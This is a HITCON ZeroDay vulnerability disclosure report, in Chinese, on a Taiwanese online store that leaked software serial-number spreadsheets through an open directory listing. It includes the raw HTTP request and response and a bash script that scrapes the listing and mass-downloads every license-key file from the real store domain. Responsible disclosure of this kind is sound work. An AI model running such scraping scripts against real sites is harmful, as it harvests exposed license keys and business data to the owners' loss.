泰騰恩 網路商城洩漏軟體序號 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00064
  • Vendor: 泰騰恩
  • Title: 泰騰恩 網路商城洩漏軟體序號
  • Introduction: 機敏的業務資料不應該擺在網站目錄底下嘿

處理狀態

目前狀態

公開
Last Update : 2016/06/24
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2016/04/22 15:48:21 : 新提交 (由 [email protected] 更新此狀態)
  • 2016/04/27 02:41:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/04/27 02:47:49 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/05/09 02:42:06 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/06/24 01:01:41 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2016-00064
  • 通報者:chris ([email protected])
  • 風險:高
  • 類型:資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://store.tech-titan.com.tw/_files/

敘述

漏洞位置: 無

備註說明:
原為中、低等級弱點,但測試人員發現外洩的軟體序號可成功被使用故調高風險等級

網頁請求:
GET /_files/sndb/ HTTP/1.1
Host: store.tech-titan.com.tw
Connection: close

網頁回應:
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2016 07:32:40 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 70799

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /_files/sndb</title>
</head>
<body>
<h1>Index of /_files/sndb</h1>
<ul>
<li>
<a href="/_files/">Parent Directory</a>
</li>
< .. 上略>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-1PC_100%ad%d3.xls">-Acronis True Image 2016 for PC-1PC_100個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-3PC_50%ad%d3.xls">-Acronis True Image 2016 for PC-3PC_50個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis%20True%20Image%202016%20for%20PC-5PC_20%ad%d3.xls">-Acronis True Image 2016 for PC-5PC_20個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%201P+3Mobile_10%ad%d3.xls">-Acronis-ATI Cloud 2016 for 1P+3Mobile_10個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%203P+10Mobile_10%ad%d3.xls">-Acronis-ATI Cloud 2016 for 3P+10Mobile_10個.xls</a>
</li>
<li>
<a href="%bc%c6%a6%ec%aa%a9-Acronis-ATI%20Cloud%202016%20for%205P+15Mobile_5%ad%d3.xls">-Acronis-ATI Cloud 2016 for 5P+15Mobile_5個.xls</a>
< .. 下略>

測試語法:

!/bin/bash

curl https://store.tech-titan.com.tw/_files/sndb/ | iconv -f "BIG5" -t "UTF-8" | \
grep "<a href" | sed -r 's#^.<a href="([^"]+)"> ([^<]+)</a>.$#\1\t\2#' > /tmp/files.txt

OLDIFS=$IFS
IFS=$'\t'

while read url name
do
wget https://store.tech-titan.com.tw/_files/sndb/$url -O $name
done < /tmp/files.txt
IFS=$OLDIFS

擷圖

留言討論

;